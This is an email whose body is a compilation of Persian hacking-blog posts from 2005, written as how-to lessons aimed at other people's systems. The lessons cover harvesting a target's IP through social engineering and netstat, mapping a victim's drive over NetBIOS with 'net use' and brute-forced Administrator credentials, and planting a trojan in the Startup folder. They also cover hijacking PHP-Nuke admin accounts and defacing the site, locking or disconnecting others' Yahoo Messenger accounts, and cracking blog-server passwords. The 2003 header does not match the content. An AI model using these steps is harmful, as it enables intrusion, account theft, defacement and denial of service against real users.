Content-Type: multipart/mixed; boundary="----------=_1055001809-54370-0"
Content-Transfer-Encoding: 7bit
MIME-Version: 1.0
X-Mailer: MIME-tools 5.41 (Entity 5.404)
Received: from [217.218.57.55] by ws1-7.us4.outblaze.com with http for
yechizi@yechizi.com; Sat, 07 Jun 2003 11:03:29 -0500
From: "Reza" <yechizi@yechizi.com>
To: yechizi@yechizi.com
Date: Sat, 07 Jun 2003 11:03:29 -0500
Subject: The Interactive Matrix
X-Originating-Ip: 217.218.57.55
X-Originating-Server: ws1-7.us4.outblaze.com
X-RCPT-TO: <yechizi@yechizi.com>
Status: U
X-UIDL: 344393350

به دست آوردن IP از طریق سایت خودتان:

    اگر سایت یا وبلاگی دارید، راههای بسیاری برای به دست آوردن IP بازدیدکنندگانتان دارید و با دادن آدرس سایت یا وبلاگتان به یکی از دوستان می توانید IP او را به دست آورید. از آنجایی که در یک لحظه ممکن است چندین بازدید کننده داشته باشید، بهتر است صفحه زیبایی مخصوص این کار بسازید که هیچ لینکی به آن نباشد و آن را برای به دست آوردن IP مورد استفاده قرار دهید.

    برای این کار دو روش اصلی داریم:

1- برنامه نویسی: با کمی جستجو در اینترنت کدهای بسیار کوتاهی را می یابید که IP را به دست می دهند و به سادگی می توانید آن را به همراه تاریخ و ساعت در یک فایل متنی یا پایگاه داده ذخیره کنید.

2- استفاده از سایتهای دیگر: اکثر شمارنده ها این امکان را به شما می دهند که IP بازدید کنندگان صفحات خود (حداقل چند بازدید کننده اخیر) را ببینید. پس با نصب یک شمارنده روی آن صفحه ای که گفتیم، IP به دست آمده است.

به دست آوردن IP از طریق مسنجرها:

    همانطور که در مقدمه گفتیم، فقط هنگامی که شما در حال ارسال یا دریافت فایلی به طور مستقیم (یا در برخی بازیهای مسنجری) باشید می توانید از این روش استفاده کنید. این روش که به روش Netstat معروف است، از همه روشها معروفتر است ولی به نظر من به خوبی روشهای بالا نیست. با کمی Social Engineering می توان هر کسی را راضی به دریافت یک فایل یا عکس کرد. بهتر است حجم فایل کم نباشد که فرصت کافی داشته باشید. البته اگر از AOL مسنجر استفاده می کنید، در منوهای آن گزینه ای برای برقراری Direct connection خواهید دید که مناسبتر است. هنگامی که فردی در حال دریافت یا فرستادن فایل به شما به طور مستقیم (نه روش فرستادن فایل با استفاده از Upload در یاهو مسنجر) باشد، با استفاده از Netstat می توانید IP او را ببینید. با توجه به شلوغ بودن خروجی Netstat یکبار قبل از آغاز به گرفتن/فرستادن فایل و بار دیگر بعد از آن این خروجی را بگیرید تا IP فرد را که به تازگی به لیست اضافه شده تشخیص دهید. برای ساده شدن کار بهتر است تمامی برنامه هایی که به هر طریق از اینترنت استفاده می کنند را ببندید که از شلوغی لیست کم شود. اگرچه در بیشتر راهنماها گفته می شود از پسوند n- استفاده کنید، به طور معمول در ایران استفاده نکردن از آن بهتر است. تنها تاثیر n- این است که تمام آدرسها را به طور عددی نشان می دهد و این کار یافتن آدرس IP ایرانیها را که به طور معمول به هر حال به شکل عددی است، در میان عددهای دیگر دشوارتر می کند.

   برای اجرای netstat کافی است cmd.exe را از run اجرا کنید و به سادگی در آن تایپ کنید netstat و enter را فشار دهید. لیستی از تمامی اتصالهای موجود بین کامپیوتر شما و کامپیوترهای دیگر را مشاهده خواهید کرد. حال پس از برقراری ارتباط، دوباره این کار را تکرار کنید، آدرس جدید آدرس IP فرد مورد نظر است. اگر در لیست آدرسهای عددی ندیدید، از netstat -n استفاده کنید. با کمی تمرین این روش برایتان آسان می شود. یک روش کمکی استفاده از روش رو به رو است: 'netstat > temp1.txt' که این کار خروجی netstat را به درون فایل temp1.txt می ریزد. (که اگر وجود نداشته باشد ساخته می شود و اگر از قبل موجود باشد اطلاعات قبلی آن پاک می شود!) و سپس پس از برقراری اتصال، 'netstat > temp2.txt' را وارد می کنید و سر فرصت تفاوت فایلها را بررسی می کنید.

به دست آوردن IP از طریق دادن IP خودتان:

    مسخره ترین روش به دست آوردن IP آدرس این است که اول IP خودتان را به آنها بدهید تا شاید روی آن کلیک کنند و IP آنها به دست شما بیفتد! متاسفانه برنامه هایی که برای به دست آوردن IP از اینرنت می گیرید یا روی CDهای بی ارزشی که به قیمت زیادی از بازار می خرید پیدا می کنید، از این روش استفاده می کنند. IP شما را به طور واضح یا کمی کد شده به فرد می دهند یا از شما می خواهند که خودتان آن لینک را که چیزی جز IP شما نیست به او بدهید تا اگر روی آن کلیک کرد IP او را به شما بدهد! شکی نیست که این روش غیر منظقی ترین روش است و بهتر است از خیر چنین برنامه هایی بگذرید! کار پیچیده ای هم نمی کنند، Port خاصی را زیر نظر می گیرند (کاری که با Netstat خودتان هم می توانستید انجام دهید) و لینکی می سازند که با کلیک روی آن فرد به آن port شما متصل شود. جدای از خطرات این روش و مشکلات آن با Firewallها، این کار به طور کلی صحیح نیست اما روشی بسیار مشابه آن وجود دارد که کمی بهتر است. اگر از web server یا ftp server موجود در IIS ویندوز (یا هر میزبان دیگری) استفاده کنید و به این شکل سایتی به راه بیندازید، باز هم با دادن IP خودتان این شانس را دارید که IP آنها را هم به دست آورید

دوشنبه 28 آذر ماه سال 1384

چگونه بفهمید که در Yahoo Messenger با چه کسانی چت داشته اید؟!

آیا دوست دارید به طور مثال بدون داشتن هیچ چیزی بفهمید چه کسانی با چه ID هایی پشت سیستم شما به اینترنت وصل شده اند یا از اون جالب تر با چه کسانی چت کرده اند!!!

خب از منوی Start گزینه Run را انتخاب کنید سپس تایپ کنید Regedit پس از باز شدن پنجره ویرایشگر ریجستری به کلید زیر بروید :

HKEY_CURRENT_USERSoftwareYahooPagerprofiles

خب چی میبینید؟ لیست یک سری ID که 100% ID شما هم در بین آنها می باشد ، بله به همین راحتی لیست تمام ID هایی که در یاهو وصل شده اند اینجا لیست شده است خب برای اینکه بفهمیم که یک ID خاص با چه کسی چت داشته است به طور مثال من ID خودم را باز می کنم

HKEY_CURRENT_USERSoftwareYahooPagerprofiles amin_jonIMVironmentsRecent

خب در پنجره مقادیر مشاهده می کنید که ID فردی که با آن چت کرده اید و ای دی خود شما قرار دارد.

به طور مثال اینجا من با YahooHelper چت کردم :

YahooHelper;ramin_jon

به همین راحتی میتوانید یکی دیگر از ID هایی رو که توی سیستم شما کانکت شده و با کسی چت کرده است را در بیارید.

پنجشنبه 17 آذر ماه سال 1384

آموزش BIG KILLER

اول بوتر رو از حا لتzipخارج کنید و در قسمتtextایدی که از قبلدر ست کرده بودین بهش میدین وبد از دادن بوتر اما ده میشه

مرحله بعد ی:

بوتر رو لو گین میکنین و بوتر آمده میشه حالا هر کس رو که میخوای بوت کن فقط طرف مقابل رو سرویس نده

شنبه 12 آذر ماه سال 1384

حذف بنرهای تبلیغاتی مانند بنرهای پرشین بلوگ

من در اینجا براتون توضیح می دهم که چطور بنر بالای صفحاتی که از سایتهای مجانی دریافت شده اند را حذف کنید (من خودم کاملا با این موضوع مخالف هستم و اصولا انجام همچین کاری درست نیست مخصوصا آموزش آن. اما برای اینکه دوستان اینقدر از من در این مورد سوال نکنند مجبور شدم این نکته را در اینجا قرار بدم. ولی تا میتونید از هک و هک بازی پرهیز کنید ;) )
این نکته رو من از یکی از سایتهای هک یاد گرفتم. همونطور که میدونید این سایتهای مجانی که اقدام به دادن سرویس می کنند برای اینکه خودشونو پشتیبانی کنند در صفحات کاربران بنر یا یک سری عوامل تبلیغاتی دیگر قرار می دهند. این کار بصورت خودکار انجام می شود یعنی اینکه وقتی شما صفحات خودتان را به سایت ارسال می کنید خود سرور بصورت اتومات اول صفحات شما این بنر رو اضافه می کنه. واگر کنترل پنل سایت شما این امکان رو داشته باشه که فایلهاتونو ادیت کنید و قتی یک فایل رو ادیت می کنید می بینید که هیچ کد اضافی در آن وجود ندارد که باعث نمایش بنر در سایت بشود. اما در اصل وقتی شما صفحه خود را ذخیره می کنید بصورت خودکار آن کد به ابتدای صفحات شما اضافه می شود.
حالا برای اینکه آن کد را از کار بیندازیم باید چه کار کنیم. خب این یک چیز منطقی هستش که برای این کار باید این کد را غیر فعال کنیم چون هیچ راه دیگری برای حذف این کد وجود ندارد به جز هک ;)
باید به این نکته توجه داشته باشید که اکثر این سایتها این کد را بعد از تگ <head/> اضافه می کنند. یعنی در صفحه از بالا شروع به دنبال گشتن تگ head می کنند و به محض برخورد به اولین تگ کد خود را در زیر آن قرار می دهند. حالا شما باید در صفحه خود دو تا تگ head/ قرار بدین که وقتی جستجو گر به تگ اولی رسید کد خودش رو قرار بده ولی head‌ اصلی شما یکی دیگر است. برای این کار می تونید از دستور <noscript> استفاده بکنید اما من این دستور رو در چند جا امتحان کردم و عمل نمی کرد بهترین حالت آن است که شما از دستور <applet> استفاده کنید. بدی این دستور این است که هنگامی که صفحه شما میخواهد بارگزاری شود در ابتدا یک پنجره باز می شود (همان پنجره ای که هنگام رفتن به سایتهایی که از یونیکد و یا حالات دیگر استفاده کرده اند نمایش داده می شود و از شما برای نصب یک سری کامپوننت از شما اجازه می گیرد) اما خب این پنجره فقط جنبه نمایش دارد و هیچ کار خاصی انجام نمی دهد. خب من کد کاملی که باید در ابتدای صفحه قرار بدید رو در اینجا قرار داده ام. امیداوارم کارتون راه بیفته ;) این کد را دقیقا قبل از تگ head/ قرار بدهید.

براتون یک مثال می آورم که بهتر متوجه بشید.

<html>
<head>
<title>Welcome To Majid Home Page (Select Language)</title>
<meta name="author" content="Majid Alavizadeh">
<meta name="copyright" content="MDOnline - Majid Alavizadeh">
<meta name="keywords" content="Majid Alavizadeh , Majid , M@jid , Virgo22 , Virgo22_ir , Virgo22_ir@yahoo.com , Virgo22_ir@hotmail.com , 131899655">

<APPLET WIDTH=1 HEIGHT=1>

</head>
<body topmargin="0" leftmargin="0">

</applet>
</head>
<body bgcolor="#000000">
<center>
 <p> </p>
<p> </p>
<p>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
codebase="http://active.macromedia.com/flash4/cabs/swflash.cab#version=4,0,0,0"
id="Index2" width="414" height="246">
<param name="movie" value="Index2.swf">
<param name="quality" value="high">
<param name="bgcolor" value="#000000">
<embed name="Index2" src="Index2.swf" quality="high" bgcolor="#000000"
width="414" height="246"
type="application/x-shockwave-flash"
pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash">
</embed></object>
</p>
.
.
.

برداشتن لینک فقط با ذکر منبع

شنبه 12 آذر ماه سال 1384

آموزش هک کردن سایت قسمت دوم

سلام دوستان خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و... حالا در این درس به آموزش چندین روش برای آموزش هک متداول ترین فروم که PHP-Nuke است بپردازیم. اول باید خصوصیات سایت را بررسی کنید و اولین خوصوصیات ضروری پی اچ پی نوک بودن آن هست! به روش های مختلف هک کردنه یوزر ادمین یا ساختن ادمین مخفی را یاد بگیرید. در هر سایت نوک یک فروم قرار دارد و همینوطور که میدانید در فروم یک یا چند نفر به cp (مخفف کنترل پانل) دسترسی دارند. شاید از همین فکر چیزی فهمیده باشید. پس در هر تالار چندین کاربر (user) وجود دارد (بستگی به کیفیت تالار دارد) و مدیر هم در بین این کاربران هست و نا کاربری او فاحش هست و می توانید آن را به راحتی ببینید.با این توضیح شما دو روش را برای هم حدس زدید. درسته ! می گن هک سایت سخته ولی اونقدرا هم سخت نیست حتی با ماجیک هم میشه سایت هک کرد! پس فعلا با ماجیک هک می کنیم تا برسیم به جاهای پیشرفته! حالا باید به سیستم طرف برای نصب تروجان نفوذ کنید و نت بایوس بهترین راه هست! نفوذ به سیستم از طریق NetBios ------------------------------------------- با یاد گیری این مقاله شما میتونید یک درایو از سیستم قربانی رو به وسیله نت بایوس Share کنید و هر کاری که خواستید توی اون درایو انجام بدید ( فایل بذارید ، بردارید ، پاک کنید و ... ) البته من این مقاله رو به صورت تصویری هم تو سایت گذاشتم ، می تونید دانلود کنید. خب بریم سره موضوع اصلی: اول باید IP سیستم مورد نظر رو پیدا کنید ( تو سایت قبلا اموزش دادم ) ، بعد از منوی Start قسمت Run برید و تایپ کنید CMD. بعد از اینکه وارد CMD شدید این دستور رو بنویسید: Net use x: IPDriveName$ به جای X میتونید هر حرفی رو بنویسید به غیر از حروفی که اسم درایو های خودتون هست.مثلا اگه درایو G داشته باشید ، از حرف G نمیتونید استفاده کنید. به جای IP هم ای پی مورد نظر رو که می خواهید بهش نفوذ کنید رو بنویسید. به جای DriveName هم اسم درایو رو بنویسید. اگه مثلا میخواهید درایو C رو Share کنید ، حرف c رو بنویسید.یک نمونه از دستور رو ببینید: Net use x: 80.191.191.39c$ اگه کمی شانس داشته باشید بدون در خواست User Name و Password درایو Share میشه و این پیغام رو مینویسه: The command completed successfully اما اگه از شما در خواست یوزر نیم و پسورد کرد به جای یوزر نیم کلمه Administrator رو وارد کنید که برای ویندوز XP و 2000 تعریف شده است ( البته معمولا تو یه خط یوزر نیم رو میده ).پسورد هم میتونید با یه برنامه مثل بروتوس( Brutus ) پیدا کنید. اگه شما درایوی رو Share کرده باشید که ویندوز قربانی هم تو همون درایو نصب شده باشه ، می تونید سرور یک تروجان رو تو پوشه Startup تو قسمت Start Menu کپی کنید و منتظر باشد قربانی ریستارت کنه تا فایل سرور اجرا شه و شما به راحتی با تروجان به سیستم وارد بشید. ( یادتون باشه که سرور رو فقط کپی کنید چون اگه اجرا کنید در واقع تو سیستم خودتون اجرا کردید ) (نویسنده : فرشاد عزیز) حالا که یک تروجان در ستارت آپ طرف کپی شد و پسورد او را دریافت کردید..... هر کاربر در هنگام ثبت نام در هر تالاری در سایت های نوک باید به اجبار ایمیلی برای خود انتخاب کند که پسورد انتخاب شده به آن ایمیل ارسال شود. ایم خودش یک باگ امنیتی هست و لازم نیست که حتما اکسپلویتی جولوی شما باشد! (ولی بعد از این روش با اکسپلویتی برای هک نوک هک آشنا می شوید)خوب به قسمت (رمزعبور را فراموش کردم) یا ( Forget PassWord ) بروید و ایمیل طرف را وارد تا پسورد فرستاده شود. (این عمل در صورتی اتفاق می شود که نام کاربری بوسیله ی یک ایمیل پشتیبانی شود که در اغلب فروم ها اینجوری هست) حالا که پسورد کاربر مدیر و یا همان شناسه مدیر را گرفتید به منطقه ی کنترل (کنترل پانل) نفوذ کنید و شناسه ی حای را پاک کرده و شناسه ای بسازید و index را عوض کنید. قبل از اینکه ورود به کنترل پانل را به شما یاد دهیم بهتر استروش دیگری برای ساخت ادمین مخفی ( hide admin ) یاد بگیریم! اول باید بفهمیم که نوک چیست؟ پی اچ پی نوک انواع مختلفی دارد که از سال ۲۰۰۱ به ورژن های مجانی تبدیل شد و برای همین شهرت زیادی پیدا کرد در ابتدا تیم های آمریکایی و پاکستانی ورزن های ۶.۸ . ۶.۹ را مجانی کردند و ایرانی های عزیز نیز برای هموطننانشان از ورژن ۷.۳ تا ۷.۸ (آخرین نسخه) را ترجمه کردند و نوک های فراسی را بوجود آوردند. مثل گروه معروف IranNuke این اکسپلویت هم به شما کمک می کند که در کنترل پانل سایت نوک وارد شوید و شناسه ی مدیرتی برای خود بسازید. این اکسپولیت برای نوک ۷.۳ تا ۷.۷ هست و نوک ۷.۸ را فقط اگر روی لکال هاست باشد هک می کند. -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- خوب در قسمتی از کد نوشته شده: http://www.sitename.com/admin.php به جای sitename نام سایت را بنویسید و آن را با پسوند html ذخیره سازید. به این صورت : exploit.html حالا روی آن کلیک کنید و صفحه ای همانند صفحه ی عضویت در آن تالار باز می شود! (حالا بستگی دارد که چه چیز هایی از شما درخواست کند) حالا آن را که پر کردید در زیر آن Create Admin را کلیک کنید و مستقیما به http://www.sitename.com/admin.php میرید و اونجا با یوزری (شناسه ایی) که ساختید وارد شوید! حالا شما هم سایت پی اچ پی نوک هک کردید! موفق باشید کپی برداری فقط با ذکر منبع به صورت فعال http://www.3line3.blogsky.com/ مجاز می باشد!

جمعه 11 آذر ماه سال 1384

magic messenger

حتما به فکر این افتادید که با چند تا ID وارد یاهو مسنجر بشید این برنامه با حجم بسیار کم که بهتون معرفی میکنم این امکان رو برای شما بوجود میاره این برنامه برای ورژنهای تمام مسنجرهای بالای 6 آزمایش شده و برای همه جواب داده یک نکته مهم دیگه اینکه زمان دانلودش خیلی کمه و میتونین اونو راحت از وبلاگم دانلود کنین

حجم 6 کیلوبایت زمان دانلود 2 ثانیه

Download

00:57 AM | مهدی | هک بوت کرک ویروس | نظرات [9]

یکشنبه 6 آذر ماه سال 1384

قفل کردن ای دی دیگران بدون استفاده از برنامه

سلام برای این بار من می خوام بهتون راهی رو یاد بدم که بتونین ای دیه دوستتون رو قفل کنین چند تا نوع داره. 1.اولین راه برای اینکه شما بتونین ای دیه دوستتون رو قفل کنین اینه که یاهو مسنجر رو باز کنین و ای دیه دوستتون رو بدین و پسوردشو تا 15 مرتبه اشتباه وارد کنین این کار باعث می شه که اون ای دی تا 12 ساعت قفل شه . 2.دومین راه برای قفل کردن ای دی اینه که شما اون ای دی رو بوسیله ی یه برنامه قفل کنین. کار با این برنامه خیلی اسونه . تنها کاری که شما باید انجام بدین اینه که بد از زدن دکمه اولی و دادن ای دیه طرف و زدن اینتر اون ای دی رو قفل کنین.اسم این برنامه id locker هست تو google سرچ کنید تا برنامه رو دانلود کنید

یکشنبه 6 آذر ماه سال 1384

خارج کردن افراد از یاهو مسنجر بدون استفاده از برنامه

امروز می خوام روش بدست اوردن ای پی دیگران و خارج کردنشون رو از یاهو بهتون یاد بدم. برای این کار شما باید استارت رو باز کنین بد روی run بزنین و کلمه ی cmd رو تایپ کنین و اینتر رو بزنین. بد یه صفحه باز میشه که شما باید کلمه ی netstat -n رو بنویسین و دوباره اینتر رو بزنین.با این کار نوشته هایی ظاهر میشه که ای پی هم هستند. پشته سر ای پی ها شماره هایی هم هست که مثلا نوشته 5050 یا 5051 که اگر اون عددها 5050 باشن ماله همون شخصه.port های 5050 یا 5010 موقع چت کردن باز میشن توجه:قبل از این کار باید اون شخص باید به شما پیغامی بده . خوب حالا برای اینکه شما بتونین اون شخص از یاهو خارج کنین باید همون ای پی دوستتون رو کپی کنین و دوباره run رو باز کنین و این رو بنویسین: t- ای پی ping بد باز یه صفحه باز می شه که پشته سر هم مینویسه بد از چند دقیقه اون ای دی از یاهو خارج میشه. توجه:این کار بعضی اوقات رویه بعضی کامپیوتر ها انجام نمیشه.

پنجشنبه 3 آذر ماه سال 1384

آموزش هک کردن وبلاگ

چندتا از دوستان به من ایمیل زده بودند و گفته بودن که آموزش هک کردن وبلاگ را بده من هم گفتم چشم اما دوستان عزیز یادتان باشد من به طور صریح و واضح این آموزش را نمی دم علتش هم به دلیل مسایل امنیتی است.یکی از دوستان از من پرسیدند که تو چه نوع هکری هستی؟کلاه سیاه یا کاله سفید؟ در جواب ایشان باید بگم که من یک هکر کلاه سفید هستم چون دوست ندارم برم وبلاگ ها یا سایت های مردم را بی خود و بی جهت هک کنم به نظر من اگر می خواهید یک هکر کلاه سیاه خوب شوید باید از مسایلی که هکرهای کلاه سفید با آن سر و کار دارند سر در بیارید چون هکرهای کلاه سیاه((اون طوری که من با چندتاشون صحبت کردم))می گن ما فقط دنبال راه های نفوذ به سیستم ها هستیم و با مسایل ضد هک زیاد آشنایی نداریم اما هکرهای کلاه سفید هم نحوه ی هک کردن را می دانند و هم ضد هک که این کمک بسیار بزرگی برای آن هاست چون وقتی بخوان به یک سیستم نفوذ کنند اما حالا به هر دلیل اون روش نفوذی شان نگیره می فهمند که قربانی چه کارهای امنیتی کرده و ضد آن را می زنند یا از راه های دیگر اقدام می کنند البته هر هکر حرفه ای وقتی ببینه نمی شه با یه روش وارد شد قطعا روش دیگر رو امتحان می کنه اما در مسایل بزرگ و سرورهای بزرگتر و مهمتر شاید نتواند آن کار را کند که دلیل اصلی اش کمبود اطلاعاتش است

خوب امروز هم همینطوری که گفتم می خوام روش هک کردن یک وبلاگ به صورت کاملا حرفه ای نه بچه بازی که برای صاحب وبلاگ یه تروجان یا یهMagic-Ps بفرستیم بعد ببینیم که روشمون نگرفته و نا امید شیم.

آموزش هک کردن وبلاگ یا همان آموزش هک وبلاگ

هک کدن یک وبلاگ به صورت حرفه ای کار چندان ساده ای نیست و مستلزم این است که شما با مفاهیم کلی شبکه و کار با نرم افزارهای , IP sniffer NMAP , Nessus بلد باشید و بتوانید با Exploit ها کار کنید البته من نمی خواهم شما را از این کار نا امید کنم ولی بهتر است این نرم افزارها و چیزهایی را که گفتم بلد باشید

خوب ما برای هک کردن یک وبلاگ باید سرور و یا سرویس دهنده ی آن را اول هک کنیم تا بتوانیم رمزها و یوزرنیم های وبلاگ یا وبلاگ های تحت سرویس آن سرور را پیدا کنیم معمولا یوزر نیم ها و یا همان آدرس وبلاگ مثل:

http://www.victim.blogserver.com/

که victim آدرس و یوزر نیم وبلاگ است کد بندی نشده است و به راحتی پس از نفوذ به سرویس دهنده ی وبلاگ می توانیم آن را پیدا کنیم اما پسوردها معمولا کدبندی شده اند و ما باید با استفاده از ابزارهای کرک پسورد،آن پسوردها را از حالت کد شده خارج کنیم که من در زیر اسم چندتا برنامه ی معروف کرک پسورد یا Password Cracker را گذاشته ام:

John the ripper

L0pht crack

Palm crack

که می توانید با جستجو در گوگل لینک دانلود آن ها را پیدا کنید و پس از دانلود از آن ها استفاده کنید که کار با آن ها بسیار آسان است بدین ترتیب که شما کلمه ی کد شده را به آن می دید و برنامه نسبت به اندازه ی ((Length)) آن شروع به شکست کد آن می نماید.یادتان باشد که L0pht crack بعد از حرف L صفر یعنی0 را دارد نه O

حالا ما چگونه به یک سرور وارد شویم؟

شما می توانید با پیدا کردن Vulnerability های یک سرویس دهنده ی وبلاگ به کمک برنامه های NAMP و یا Nessus و امتحان Exploit های نوشته شده برای آن آسیب پذیری ها ((Vulnerability)) به سیستم سرور نفوذ کرده و کنترل آن را در دست بگیرید البته این یادتان باشد که فقط به قسمت اطلاعات سرور که معمولا دارای آسیب پذیری است نفوذ کنید و به قسمت های دیگر به هیچ عنوان نوذ نکنید در ضمن این کار با هک کردن سایت فرق می کند اما روش های نزدیک به همی برای انجام هر دوی آن ها استفاده می شود

البته بلاگفا تا چند روز پیش در رده ی دوم قرار داشت اما به دلیل اخذ تدابیر امنیتی خوب در رده ی پنجم جای گرفت.البته من این رده بندی را براساس تعداد وبلاگ های هک شده ی آن سرور،تدابیر امنیتی اتخاذ شده ی آن سرور،تعداد دفعاتی که خودم به آن سرور نفوذ کرده ام و سوال از حدود 16 هکر انجا داده ام.

البته اگر این را برای شما سخت است من در پست بعد روش دیگری را که کمی آسان تر است را به شما می گویم.

خوب این هم از آموزش هک کردن وبلاگ قسمت اول.

یکی از دوستان پرسیده بودند که برنامه ی THC-scan 2.0 را ار سایت اصلی اش دانلود کرده ام اما موقعی که روی برنامه کلیک می کنم صفحه ی سیاهی می یاد و بعدش می ره چه کار کنم؟

دوست عزیز من آسان ترین راه را به شما می گویم اول برنامه یعنی فایل .exe را به پوشه ی System 32 ویندوز خود ببرید و CMD را اجرا کرده و نام برنامه را که در زیر آیکون قرار دارد را در آن بنویسید و Enter کنید و پس از اجرا کار خود را انجام بدید

نظرات یا دتون نره

چهارشنبه 2 آذر ماه سال 1384

آموزش هک سرور

ما برای شروع یک سری اطلاعات در باره ساختار اینترنت می خواهیم... اول از همه اینکه یک آدرس وبسایت که از این به بعد بهش می گیم Domain (یادتون باشه) در حقیقت یک آدرس آی پی است... وقتی در مرورگر اینترنت خود آدرس یک وبسایت رو می نویسید٬ سرویس گری به نام DNS این آدرس رو به آی پی ترجمه می کند... برای همین است که تا آدرس رو می نویسید و Enter رامی زنید اون پایین برای چند لحظه کوتاه یه آی پی ظاهر می شود و بعد وب لود می شود... سایتی مثلwww.yahoo.com.com در حقیقت برای اینکه حفظ کردنش راحتتر شده باشه به این شکل در اومده... یعنی در مرورگر اینترنت اگر شما به جای اسم سایت٬ ادرس آی پی اون رو بدین٬ خیلی سریعتر و راحت تر سایت براتون باز میشه... خب این از این حالا می رسیم به اینکه سرور هکینگ چه فرقی با کلاینت هکینگ داره... ببینید٬ تمامی فایل های یک سایت ٬ یعنی اونهایی که به کمکشون سایت ها بالا می آیند و در حقیقت هدف اصلی ما ٬ در پوشه ای به نام Inetpub دخیره می شود ... این فایل ها شامل وبسایت٬ ایمیل ها اسکریپت ها و FTP آنهاست ... خب ما اگه به این پوشه دسترسی پیدا کنیم٬ داخلش می رویم وپوشه هایی رو میبینیم که یکیشون wwwroot است..این همونی است که ما می خواهیم ...داخل ۰این پوشه حتما فایلی به نام index.htm ویا main.htm هست که صفحه اصلی را شامل می شود ... فایل های دیگه ای هم هست که صفحات دیگر وبسایت را شامل می شود... می رویم سراغ پوشه های دیگر در Inetpub : پوشه بعدی نامش mailroot است.... در این پوشه ایمیل ها و حساب های ایمیل موجود در این سرور را پیدا خواهید کرد. پوشه بعدی ftproot میباشد٬٬٬ در این پوشه فایلهایی که با استفاده از FTP بهشون دسترسی داریم مشخص می شود (اکثرا این پوشه رو برای همون وبسایت می گذارند) در مورد ftp بعدا مفصل صحبت می کنم . با پوشه های دیگه هم کاری ندارم ولی بدونین که برای ذخیره اسکریپت ها و از اینجور کاراست ... خب در مورد ftp هم توضیح مختصری می دم و برای امروز بسه : ftp مخفف کلمه file transfer protocol به معنی پیمان انتقال فایل است ... ما از این پروتکل (پروتکل به معنی رابطی است که در دوطرف یک ارتباط شبکه ای موجب انجام کار تبادل بسته اطلاعاتی می شود) برای تبادل فایل استفاده می کنیم٬٬٬ شما برای دسترسی به ftp می توانید از برنامه های مختلفی استفاده کنید : مثلا بهترینشون خود بسته نوم افزاری ftp در سیستم های عامل ویندوز و لینوکس است... البته کمی سخته در این حالت کار کردن چون محیطی شبیه داس دارد... اما راه بهتری وجود دارد : در هر مرورگری مانند Netscape,internet explorer,mozila, ... می توانید با صدور فرمان ftp://your/ FTP SERVER به این سرویس دسترسی پیدا کنین... می تونین برای امتحان همین الان به ftp خود مایکروسافت وصل بشین : مرورگر خود را باز کنین و در قسمت آدرس بنویسید : ftp://microsoft.com/ تا بعد از چند لحظه به یک پوشه جالب دسترسی پیدا کنین... این پوشه عین یکی از پوشه های سیستم خودتون است ... این فایل ها رو فقط می تونین بروی سیستم خود کپی کنین چون مایکروسافت اجازه تغییرات رو به شما نمی دهد.

رسیدیم به اونجا که از طریق ftp میشد به فایل های یک سیستم دسترسی پیدا کرد خب حالا که فهمیدیم فایل های یک وبسایت کجا هستند و چه آرایشی دارن٬ آماده برای سرور هکینگ هستیم چون اگر روزی بتونین به یک سرور نفوذ کنین اون وقته که باید بدونین فایل های وب کجا هستند که کارهای خودتون رو بتونین انجام بدین ... حالا شروع می کنم به توضیح کارهایی که می تونیم انجام بدیم تا کنترل یک وبسایت دست ما بیاد : Telnet : تلنت رو قبلا توضیح داده بودم٬ اما حالا به طور مفصل تر و قابل فهم تر برای سرور هکینگ بیان می کنم یه خرده مطلب براتون باز بشه ؛؛؛ ببینید٬ کار اصلی تلنت٬ جواب به پارامتر های ارسالی ما به درگاه های یک کامپیوتر است... خب یعنی چی؟ یعنی این که ما می دونیم یک سیستم چه درگاه های بازی دارد اما می خواهیم از این درگاه ها کار بکشیم؛ این کار رو تلنت برای ما انجام میده... مثلا وقتی شما ایمیل می فرستید یا میگیرید٬ در حقیقت از دو درگاه ۲۵ و ۱۱۰ استفاده می کنین و برنامه هایی که این کار (فرستادن و گرفتن نامه) را انجام میدهند در حقیقت واسط گرافیکی (GUI) همین تلنت خودمون هستند...این یعنی اینکه با استفاده از همین تلنت و محیط خسته کننده و یکنواخت آن٬ ما باید بتوانیم نامه بفرستیم و یا بگیریم٬٬٬ من هم میگم که میتونیم و طرز کار باهاش رو هم بعدا اگر وقت بود میگم یا این که می تونین توی وبسایت آراز صمدی اونو بخونین... خب ما از این تلنت اولین استفاده ای که می کنیم صحبت با درگاه ۲۳ است که درگاه اختصاصی خود تلنت می باشد .به یاد داشته باشید که با تلنت با هر درگاهی میشه گفتگو کرد‌(البته به زبان خاص خودش) اما این درگاه مخصوص تلنت است و ما می تونیم خیلی باهاش حال کنیم :D اما چطور ؟ : ببینید تلنت دو سرویس اصلی دارد که یکیش متغیر و دیگری حتما با رمز است حالا میگم چرا : سرویس اولی در حقیقت استفاده از اون سرور به عنوان یک سرویس دهنده فقط متنی است که یک پایگاه مثلا یک کتابخانه به شما ارایه می کنه تا با تلنت کردن به اون کتابخونه از راه دور٬ کنترل کنید کتابی که می خواهید در آن کتابخانه موجود هست یا نه که راه دوری رو تا کتابخانه طی نکنین و آخرش هم بفهمید که کتاب مورد نظر در دسترس نمی باشد !!! این یکی از استفاده های سرویس اولی تلنت است که ما در مورد کتابخانه گفتیم... خب به طور حتم این سرویس برای استفاده عموم است و پسوردی ندارد اما در بعضی موارد این سرویس با کلمه عبور محافظت می شود چون ممکن است اطلاعات موجود در آن سرور برای عموم نباشد و فقط افراد خاصی حق دارند از آن مطلع شوند؛ مثل اطلاعات نظامی یا امنیتی ! در این حالت حتما سرور با یک کلمه عبور محافظت میشود خب این سرویس اولی بود اما سرویس دومی‌ : در این حالت که حالت پیش فرض تلنت است ما با وصل شدن به اون سیستم به تمام فایل های اون سیستم دسترسی پیدا می کنیم و این همونی است که ما می خواهیم ! در این حالت حتما درگاه پسورد دارد و جالبه بدونین کلمه کاربری و رمز عبورش همون پسورد ورود به سیستم است یعنی همونی که شما با وارد کردنش وارد سیستم عامل (چه ویندوز و چه یونیکس) میشوید ... خب حالا باید فهمیده باشید که یک اکانت در یک سیستم که کلمه عبوری نداشته باشد چقدر خطرناک است ... باید اضافه کنم با نام کاربری و پسورد هر اکانتی که در سیستم تعریف شده باشد میتوان به سیستم تلنت کرد و این یعنی اوج خطر 